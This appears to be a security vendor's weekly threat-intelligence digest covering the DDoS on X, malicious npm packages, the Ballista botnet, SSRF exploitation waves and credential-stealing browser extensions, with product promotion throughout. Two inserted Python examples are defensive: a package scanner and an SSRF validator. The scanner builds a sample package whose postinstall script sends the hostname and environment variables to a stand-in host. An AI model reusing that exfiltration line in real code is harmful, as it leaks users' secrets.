Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here.
NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.
X Hit by ‘Massive Cyber-attack’ Amid Dark Storm’s DDoS Claims
(TLP: CLEAR) Intelligence reporting details a recent distributed denial-of-service (DDoS) attack targeting the social media platform X, causing a temporary outage to the platform’s services. The hacktivist collective known as “Dark Storm,” citing pro-Palestinian motivations, has claimed responsibility for orchestrating the DDoS attack. Although initially described by the platform owner Elon Musk as a “massive cyberattack,” attribution was uncertain until Musk later indicated attack traffic originated from Ukrainian IP addresses, a claim firmly denied by the hacktivist group, Dark Storm. The group later provided verification through the publicly accessible monitoring service Check-host[.]net, aligning with a common practice among hacktivists to substantiate successful attacks. Given the operational sophistication demonstrated, this campaign likely involved considerable resources, suggesting potential state-level involvement or support from a highly organized threat actor. Furthermore, given the geopolitical context and the conflicting claims surrounding this attack, especially Musk’s emphasis on Ukrainian IP attribution and Dark Storm’s explicit denial of Ukrainian involvement, the scenario highlights possible deceptive tactics, including IP spoofing or exploitation of compromised infrastructure. Security professionals must consider these complexities when evaluating attribution and remain vigilant against misinformation during cyber incidents.
(TLP: CLEAR) Comments: Given the broader geopolitical context—including rising tensions between the United States and Ukraine and Elon Musk’s prominent governmental role as head of the Department of Government Efficiency—attribution claims could potentially be leveraged for political influence, shaping public perception around international relations. Furthermore, the distinct ideological alignment of Dark Storm, a pro-Palestinian hacktivist collective, introduces additional complexities. It’s plausible that compromised devices within Ukraine’s digital infrastructure were unknowingly utilized by attackers, or the reported IP attribution itself may be misleading or incorrect.
(TLP: CLEAR) Recommended best practices/regulations: Critical Infrastructure and Security Agency (CISA), FBI, and Multi-State ISAC publication “Understanding and Responding to Distributed Denial-of-Service Attacks”: “Develop an organization DDoS response plan. The response plan should guide your organization through identifying, mitigating, and rapidly recovering from DDoS attacks. All internal stakeholders—including your organization’s leaders and network defenders—and service providers should understand their roles and responsibilities through all stages of a DDoS attack. At a minimum, the plan should include understanding the nature of a DDoS attack, confirming a DDoS attack, deploying mitigations, monitoring and recovery.”
(TLP: CLEAR) Vercara: Vercara’s Protective DDoS solution, Vercara Ultra DDoS Protect, uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations.
Source: https://www.bleepingcomputer.com/news/security/x-hit-by-massive-cyberattack-amid-dark-storms-ddos-claims/
Surge in Malicious Software Packages Exploits System Flaws
(TLP: CLEAR) Researchers have identified a significant increase in malicious software packages specifically designed to exploit system vulnerabilities using sophisticated obfuscation and stealth techniques. According to a recent Fortinet report analyzing threats detected since November 2024, threat actors are increasingly deploying lightweight, concealed software packages to infiltrate targeted systems, effectively bypassing conventional security defenses. Additionally, the report underscores a troubling surge in advanced evasion strategies, with threat actors releasing over a thousand malicious packages engineered to remain undetected. According to reporting, many of the malicious packages analyzed feature minimal file footprints, intentionally designed to reduce the likelihood of raising security alerts while effectively executing harmful payloads. Furthermore, reporting indicated that 1,052 of these packages include covert installation scripts capable of silently deploying malicious code onto victim systems without any user intervention or awareness. Further investigation into the malicious packages identified approximately 974 instances of active connections to command-and-control (C2) infrastructure via suspicious URLs, indicating their primary role was enabling remote exploitation and persistent attacker control. Additional analysis revealed another 681 packages leveraged common APIs such as https.get and https.request to stealthily exfiltrate sensitive data from infected systems, demonstrating the threat actors’ persistent reliance on subtle, yet effective methods for unauthorized data extraction.
(TLP: CLEAR) Comments: Many malicious software packages uncovered in the aforementioned investigation utilized suspicious installation scripts embedded with covert API calls. Such scripts facilitated the clandestine exfiltration of sensitive system data to external attacker-controlled servers, bypassing conventional detection mechanisms. Moreover, several packages deliberately omitted metadata or repository URLs, complicating scrutiny, traceability, and accurate attribution. Collectively, these evasive tactics underscore a concerning escalation in software supply chain threats, with adversaries increasingly manipulating trusted distribution channels to execute widespread malware deployments.
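The three traits the report calls out (install-time hook scripts, omitted repository metadata, and source that calls https.get or https.request to ship host data) can be triaged mechanically before a package is approved. The script below is an added example, not Fortinet's or Vercara's tooling; the scoring thresholds and the sample package it writes to a temp directory are constructed for illustration.

```python
"""Heuristic triage of an unpacked npm package for the traits the report
describes: install-time hook scripts, missing repository metadata, and
source that calls https.get / https.request to ship host data. Added
example (not Fortinet's or Vercara's tooling); thresholds are constructed."""
import json, os, re, tempfile

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
NET_RE = re.compile(r"\bhttps?\.(get|request)\s*\(")   # outbound calls named in the report
HOST_DATA_RE = re.compile(r"\bos\.(hostname|userInfo|networkInterfaces)\s*\(|process\.env\b")

def scan_package(pkg_dir):
    """Return findings for the package rooted at pkg_dir."""
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    f = {"install_hooks": {}, "missing_metadata": [], "network_calls": [], "host_data_reads": []}
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        if hook in scripts:
            f["install_hooks"][hook] = scripts[hook]
    for field in ("repository", "homepage"):    # omitted metadata hampers traceability
        if not manifest.get(field):
            f["missing_metadata"].append(field)
    for root, _dirs, files in os.walk(pkg_dir):
        for name in sorted(files):
            if not name.endswith((".js", ".mjs", ".cjs")):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            rel = os.path.relpath(path, pkg_dir)
            if NET_RE.search(src):
                f["network_calls"].append(rel)
            if HOST_DATA_RE.search(src):
                f["host_data_reads"].append(rel)
    return f

def risk_score(f):
    """Additive score; an install hook plus a file that both reads host data
    and makes an outbound HTTPS call is the strongest signal."""
    score = 2 if f["install_hooks"] else 0
    score += len(f["missing_metadata"])
    if f["install_hooks"] and set(f["network_calls"]) & set(f["host_data_reads"]):
        score += 4
    elif f["network_calls"]:
        score += 1
    return score

def build_sample_package():
    """Write a constructed package exhibiting the reported traits; return its path."""
    d = tempfile.mkdtemp(prefix="pkg-")
    manifest = {"name": "example-utils", "version": "1.0.0",
                "scripts": {"postinstall": "node setup.js"}}   # no repository/homepage
    with open(os.path.join(d, "package.json"), "w", encoding="utf-8") as fh:
        json.dump(manifest, fh)
    with open(os.path.join(d, "setup.js"), "w", encoding="utf-8") as fh:
        fh.write("const https = require('https'); const os = require('os');\n"
                 "https.request({host: 'example.invalid', method: 'POST'})"
                 ".end(JSON.stringify({h: os.hostname(), e: process.env}));\n")
    return d

if __name__ == "__main__":
    findings = scan_package(build_sample_package())
    print(json.dumps(findings, indent=2), "risk score:", risk_score(findings))
```

A score this high on a package with no repository field is a review trigger, not a verdict; legitimate native-module packages also use install hooks.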
(TLP: CLEAR) Recommended best practices/regulations: OWASP API Top 10, API9:2023 “Improper Inventory Management”:
- Inventory all API hosts and document important aspects of each one of them, focusing on the API environment (e.g. production, staging, test, development), who should have network access to the host (e.g. public, internal, partners) and the API version.
- Inventory integrated services and document important aspects such as their role in the system, what data is exchanged (data flow), and their sensitivity.
- Document all aspects of your API such as authentication, errors, redirects, rate limiting, cross-origin resource sharing (CORS) policy, and endpoints, including their parameters, requests, and responses.
- Generate documentation automatically by adopting open standards. Include the documentation build in your CI/CD pipeline.
- Make API documentation available only to those authorized to use the API.
- Use external protection measures such as API security specific solutions for all exposed versions of your APIs, not just for the current production version.
- Avoid using production data with non-production API deployments. If this is unavoidable, these endpoints should get the same security treatment as the production ones.
- When newer versions of APIs include security improvements, perform a risk analysis to inform the mitigation actions required for the older versions. For example, whether it is possible to backport the improvements without breaking API compatibility or if you need to take the older version out quickly and force all clients to move to the latest version.
(TLP: CLEAR) Vercara: Vercara UltraAPI offers a comprehensive solution to the complex challenges security teams face in safeguarding API applications against cyber threats. It provides thorough discovery of the entire API landscape, including external and internal APIs, assesses API risk posture to highlight critical vulnerabilities needing remediation, and delivers real-time protection to prevent API attacks, ensuring data safety, preventing fraud, and avoiding business disruptions. This solution stands out by addressing every phase of the API security lifecycle, promoting best practices in security and governance to eliminate risks effectively. Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses for both users and machines using defined categories, including botnet Command and Control (C2), together with machine learning that detects previously uncategorized malicious associations, and helps prevent data exfiltration or malware detonation.
Source: https://www.infosecurity-magazine.com/news/malicious-software-packages/
Ballista Botnet Exploits Unpatched TP-Link Vulnerability, Infects Over 6,000 Devices
(TLP: CLEAR) Intelligence reporting has highlighted the Ballista botnet, recently observed in the wild exploiting a critical remote code execution vulnerability (CVE-2023-1389) affecting TP-Link Archer AX-21 routers. First identified on January 10, 2025, this ongoing malicious campaign specifically targets unpatched devices, stressing the continued risk posed by outdated or vulnerable router firmware. Although initially exploited by the Mirai botnet in April 2023, CVE-2023-1389 has since attracted numerous threat actors, including those specializing in malware variants such as Condi and AndroxGh0st. Ballista differentiates itself through an advanced autonomous propagation mechanism, systematically scanning for susceptible TP-Link Archer routers and subsequently exploiting CVE-2023-1389. Following successful exploitation, the malware deploys a dropper payload designed to retrieve and execute the primary Ballista binary, which supports diverse system architectures, including MIPS, MIPSEL, ARMv5l, ARMv7l, and x86_64. Once established, the botnet creates an encrypted command-and-control (C2) channel over port 82, enabling threat actors to remotely issue malicious commands. Ballista’s core functionalities include executing arbitrary shell commands, launching distributed denial-of-service (DDoS) attacks, and exfiltrating sensitive files from compromised devices. Additionally, Ballista utilizes advanced anti-forensic tactics, including terminating pre-existing malware processes and removing competing malware, to maintain stealth and persistent control over infected routers. Security researchers emphasize Ballista’s rapid, autonomous self-propagation capability, achieved by persistently scanning for and exploiting unpatched TP-Link routers vulnerable to CVE-2023-1389. Given the botnet’s sophisticated evasion tactics and ongoing propagation, immediate patching and comprehensive security monitoring are strongly advised to mitigate it.
(TLP: CLEAR) Comments: Further analysis into the Ballista botnet campaign indicates a widespread global infection, with more than 6,000 devices already compromised. Countries experiencing the highest infection rates include Brazil, Poland, the United Kingdom, and Bulgaria, signaling a geographically dispersed threat landscape. To proactively mitigate the threat, users and administrators should promptly apply available firmware updates provided by TP-Link. Network security teams should remain vigilant, monitoring for suspicious network traffic and unusual outbound connections, specifically to port 82 or known TOR-based command-and-control (C2) servers.
(TLP: CLEAR) Recommended best practices/regulations: NIST Special Publication 800-189: “Source address spoofing is often combined with reflection and amplification from poorly administered open internet servers (e.g., DNS, NTP) to multiply the attack traffic volume by a factor of 50 or more. The attacker may use a single high-capacity computer with a high bandwidth internet connection or a botnet consisting of many compromised devices to send query requests to high-performance internet servers. The attacking systems employ source address spoofing, which inserts the IP address of the target as the source address in the requests. For internet services that use the User Datagram Protocol (UDP) (e.g., DNS, NTP), the query and response are each contained in a single packet, and the exchange does not require the establishment of a connection between the source and the server (unlike Transmission Control Protocol (TCP)). The responses from such open internet servers are directed to the attack target since the target’s IP address was forged as the source address field of the request messages. Often, the response from the server to the target address is much larger than the query itself, amplifying the effect of the DoS attack. Such reflection and amplification attacks can result in massive DDoS with attack volumes in the range of hundreds of Gbps.”
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses Cyber Threat Intelligence feeds, domain categories, and other detection engines to assess DNS queries in real-time and block domains that are being used for phishing, malware delivery, and malware Command and Control (C2). This reduces the quantity and impact of malware infections.
Vercara UltraDDoS Protect is overseen by a 24/7 Security Operations Center (SOC) staffed by senior-level DDoS mitigation professionals who have the expertise, skills, and tools to thwart even the most sophisticated DDoS attacks.
Over 400 IPs Exploiting Multiple SSRF Vulnerabilities in Coordinated Cyber Attack
(TLP: CLEAR) On March 9, security researchers observed a surge in exploit attempts leveraging Server-Side Request Forgery (SSRF) vulnerabilities, affecting various widely deployed software platforms. This sharp spike involved at least 400 unique IP addresses simultaneously targeting 10 distinct SSRF-related CVEs, a clear departure from routine background scanning typically attributed to common botnets. The synchronization and structure of this activity strongly suggest sophisticated, automated exploitation or targeted reconnaissance operations preceding potential compromise. According to reporting, the most heavily targeted regions during this exploitation wave included the United States, Germany, Singapore, India, and Japan, highlighting the global impact of the threat. It was also mentioned that Israel had previously experienced SSRF exploitation activity beginning in January, with renewed intensity observed in this latest campaign. Server-Side Request Forgery remains a critically important attack vector because a vulnerable server can be induced to reach internal systems and cloud metadata APIs, which attackers frequently exploit to harvest cloud credentials, establish network footholds, pivot laterally after initial compromise, and conduct extensive internal reconnaissance. Historically, SSRF vulnerabilities have proven especially damaging, most famously illustrated by the 2019 Capital One breach, which resulted in the exposure of over 100 million customer records.
(TLP: CLEAR) Comments: The recent exploitation campaign targeted SSRF vulnerabilities across several high-profile software platforms. Among these was CVE-2020-7796 in Zimbra Collaboration Suite, which allows attackers to interact directly with internal resources and remains widely targeted for that reason, posing significant risks to enterprise security. Attackers also exploited CVE-2021-22054 (VMware Workspace ONE UEM) and CVE-2021-21973 (VMware vCenter), critical vulnerabilities enabling extensive unauthorized access within virtualized environments, further elevating the threat to corporate networks, along with CVE-2021-39935 (GitLab Collaboration Suite). The campaign further leveraged CVE-2024-6587, a newly identified SSRF flaw affecting BerriAI’s LiteLLM, highlighting attackers’ growing attention to vulnerabilities in emerging AI-driven tools and their underlying infrastructure, and CVE-2024-5830 (ColumbiaSoft DocumentLocator), as attackers increasingly target document management systems and other critical business processes. Exploitation also included older yet often overlooked SSRF vulnerabilities such as CVE-2017-0929 (DotNetNuke), demonstrating attackers’ ongoing reliance on legacy vulnerabilities to escalate privileges and access internal resources.
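The metadata-API exposure described above is what a server-side fetch should refuse by construction: resolve the hostname first, then reject any destination in a loopback, private, link-local or metadata range before connecting. The validator below is an added example, not code from the reporting or from any of the named products; `FAKE_DNS` and `fake_resolver` are a constructed stand-in for DNS so it runs offline, and `default_resolver` is what a deployment would pass instead.

```python
"""SSRF egress check: resolve, then refuse non-routable or metadata
destinations. Added example, not from the report or any vendor; the
fake resolver below is constructed so the check can run offline."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Explicit metadata endpoints on top of the generic range checks.
METADATA_NETS = [ipaddress.ip_network("169.254.169.254/32"),   # AWS/GCP/Azure IMDS
                 ipaddress.ip_network("fd00:ec2::254/128")]    # AWS IMDS over IPv6

def default_resolver(host):
    """Every address the host resolves to, both families (real DNS)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_disallowed_ip(ip):
    """True for loopback, private, link-local, reserved, multicast or metadata addresses."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped          # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    if (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified):
        return True
    return any(addr in net for net in METADATA_NETS)

def validate_outbound_url(url, resolver=default_resolver):
    """Return (ok, reason, addresses). Callers must connect only to the
    returned addresses, not re-resolve, to close the DNS-rebinding window."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed", set()
    if not parts.hostname or parts.username or parts.password:
        return False, "missing host or embedded credentials", set()
    try:
        addrs = resolver(parts.hostname)
    except (socket.gaierror, ValueError):
        addrs = set()
    if not addrs:
        return False, "unresolvable host", set()
    bad = sorted(ip for ip in addrs if is_disallowed_ip(ip))
    if bad:      # reject if ANY answer is internal, not just the first one tried
        return False, f"resolves to disallowed address {bad[0]}", set()
    return True, "ok", addrs

# Constructed DNS answers; 8.8.8.8 stands in for an ordinary public host.
FAKE_DNS = {
    "public.example": {"8.8.8.8"},
    "metadata.example": {"169.254.169.254"},
    "rebind.example": {"8.8.8.8", "10.0.0.5"},    # mixed public/internal answer set
    "mapped.example": {"::ffff:127.0.0.1"},
}

def fake_resolver(host):
    """Constructed stand-in for DNS: literal IPs resolve to themselves."""
    try:
        return {str(ipaddress.ip_address(host))}
    except ValueError:
        return FAKE_DNS.get(host, set())

if __name__ == "__main__":
    for u in ("https://public.example/", "http://metadata.example/",
              "http://169.254.169.254/", "http://rebind.example/", "file:///etc/hosts"):
        print(u, validate_outbound_url(u, fake_resolver)[:2])
```

Redirects must be re-validated hop by hop with the same function, since a 302 from an allowed host to an internal address is the classic bypass.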
(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 6.4.2: “For public-facing web applications, an automated technical solution is deployed that continually detects and prevents web-based attacks, with at least the following:
- Is installed in front of public-facing web applications and is configured to detect and prevent web-based attacks.
- Actively running and up to date as applicable.
- Generating audit logs.
- Configured to either block web-based attacks or generate an alert that is immediately investigated.”
(TLP: CLEAR) Vercara: Vercara’s Web Application Firewall, UltraWAF, helps prevent common exploits of vulnerabilities in web applications that could lead to the insertion of malware. Signatures for new vulnerabilities are constantly updated, along with granular input validation controls and traffic filtering measures for flexibility. UltraWAF includes a number of tools for managing both benign and malicious bots, including bot signatures and device fingerprinting. UltraWAF can also prevent some layer 7 DDoS attacks.
Source: https://thehackernews.com/2025/03/over-400-ips-exploiting-multiple-ssrf.html
Researchers Expose New Polymorphic Attack That Clones Browser Extensions to Steal Credentials
(TLP: CLEAR) Recent reporting sheds light on a new, sophisticated malware campaign involving polymorphic browser extensions designed to covertly harvest user credentials and sensitive information. According to security researchers, the aforementioned malicious extensions are engineered to seamlessly mimic legitimate browser extensions, including trusted password managers, cryptocurrency wallets, and banking applications. By generating pixel-perfect replicas of authentic extension icons, HTML popups, and interaction workflows, these polymorphic threats become virtually indistinguishable from the genuine tools they impersonate. Additionally, the attack briefly disables the authentic extension and replaces its interface elements with malicious visual replicas. This subtle manipulation convinces users they are interacting with a trusted extension, deceiving them into inadvertently revealing sensitive information, facilitating stealthy credential theft.
(TLP: CLEAR) Comments: The attack begins when victims unknowingly install a malicious polymorphic browser extension disguised as an AI-powered marketing tool, typically promoted through popular social media platforms. Once initiated, the installation prompts users via a popup to pin the extension, allegedly enhancing its functionality. To maintain credibility and avoid suspicion, the malicious extension initially provides the promised AI marketing services. In order to protect against such sophisticated threats, organizations and individuals should adopt browser-native security solutions that dynamically analyze extension behaviors in real-time. Such proactive measures can detect anomalous activities, including polymorphic patterns, even if they surface well after installation.
(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION
Control:
- Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code.
- Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures.
- Configure malicious code protection mechanisms to:
  1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and
  2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection.
- Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.”
NIST requires malware detection and prevention solutions. This can be on the device, as with anti-virus agents, but also can be augmented by Protective DNS provided by the network that the device is on or across the Internet. This provides defense-in-depth and support for devices such as Internet of Things (IoT) or some servers that cannot run an endpoint client.
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections.